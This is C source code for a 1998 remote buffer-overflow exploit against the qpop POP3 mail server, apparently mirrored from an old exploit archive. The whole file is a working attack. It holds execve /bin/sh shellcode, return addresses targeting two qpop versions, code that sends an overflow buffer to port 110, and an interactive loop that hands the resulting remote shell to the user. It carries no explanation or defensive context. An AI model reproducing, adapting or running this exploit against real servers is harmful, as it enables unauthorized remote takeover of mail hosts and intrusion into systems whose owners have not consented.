home *** CD-ROM | disk | FTP | other *** search
- /* qpop buffer overflow exploit (pop_msg)
- * Mon Jun 29 01:26:06 GMT 1998 - herp
- * Herbert Rosmanith
- * herp@wildsau.idv.uni-linz.ac.at
- */
-
- #include <stdio.h>
- #include <sys/time.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <netdb.h>
- #include <signal.h>
- #include <unistd.h>
- #include <errno.h>
-
- long addrlist[]={
- 0xbfffeee4, /*2.2*/
- 0xbfffec2c /*2.41beta1*/
- };
-
- char shellcode[] =
- "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
- "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
- "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
- "\xff\xff/bin/sh.........";
-
- void die(char *s)
- {
- if (errno) perror(s);
- else fprintf(stderr,"%s\n",s);
- exit(-1);
- }
-
- void usage()
- {
- printf("qpush [-index] <hostname>\n"
- " -0 QPOP Version 2.2 (default)\n"
- " -1 QPOP Version 2.41beta1\n");
- exit(0);
- }
-
- int resolv(char *host,long *ipaddr)
- {
- if (isdigit(host[0]))
- {
- *ipaddr=inet_addr(host);
- if (*ipaddr==-1) return -1;
- }
- else
- {
- struct hostent *hp;
- if ((hp=gethostbyname(host))==NULL)
- {
- fprintf(stderr,"tc: %s: unknown host\n");
- exit(-1);
- }
- *ipaddr=*(unsigned long *)hp->h_addr;
- }
- return 0;
- }
-
- int connect_to(char *hostname,short port)
- {
- struct sockaddr_in s_in;
- int s;
-
- s=socket(PF_INET,SOCK_STREAM,0);
- if (s==-1) die("socket");
-
- if (resolv(hostname,(long *)&s_in.sin_addr.s_addr)==-1)
- die("unknown host");
- s_in.sin_family=AF_INET;
- s_in.sin_port=htons(port);
-
- if (connect(s,(struct sockaddr *)&s_in,sizeof(s_in))==-1)
- die("connect");
-
- return s;
- }
-
- void socket_read(int s,char *buf,int len)
- {
- int i;
- switch(i=read(s,buf,len))
- {
- case -1:
- die("unexpected EOF");
- case 0:
- die("EOF");
- default:
- buf[i]=0;
- //printf("%s",buf);
- break;
- }
- }
-
- void terminal(int s)
- {
- char buf[1024];
- fd_set rfds;
- fd_set fds;
- int i;
-
- for (i=0;i<NSIG;i++) signal(i,SIG_IGN);
- FD_ZERO(&fds);
- FD_SET(0,&fds);
- FD_SET(s,&fds);
- for (;;)
- {
- memcpy(&rfds,&fds,sizeof(fds));
- i=select(s+1,&rfds,NULL,NULL,NULL);
- if (i==-1) die("select");
- if (i==0) die("session closed");
- if (FD_ISSET(s,&rfds))
- {
- if ((i=read(s,buf,sizeof(buf)))<1)
- die("session closed");
- write(1,buf,i);
- }
- if (FD_ISSET(0,&rfds))
- {
- if ((i=read(0,buf,sizeof(buf)))<1)
- die("session closed");
- write(s,buf,i);
- }
- }
- }
-
- void main(int argc,char *argv[])
- {
- char buf[1024+128];
- int s,i,ix;
-
- if (argc>=2 && argv[1][0]=='-')
- {
- ix=atoi(&argv[1][1]);
- argc--;
- argv++;
- }
- else ix=0;
-
- if (argc!=2 || ix>sizeof(addrlist)/sizeof(long))
- usage();
-
- s=connect_to(argv[1],110); /* WKS POP3 */
- socket_read(s,buf,sizeof(buf));
- memset(buf,0x90,sizeof(buf));
- for (i=981;i<981+10*4;i+=4)
- memcpy(&buf[i],&addrlist[ix],4);
- memcpy(&buf[941],shellcode,strlen(shellcode));
- buf[sizeof(buf)-3]=0x0d;
- buf[sizeof(buf)-2]=0x0a;
- buf[sizeof(buf)-1]=0x00;
- write(s,buf,sizeof(buf));
- socket_read(s,buf,sizeof(buf));
- terminal(s);
-
- }
- /* www.hack.co.za [2000]*/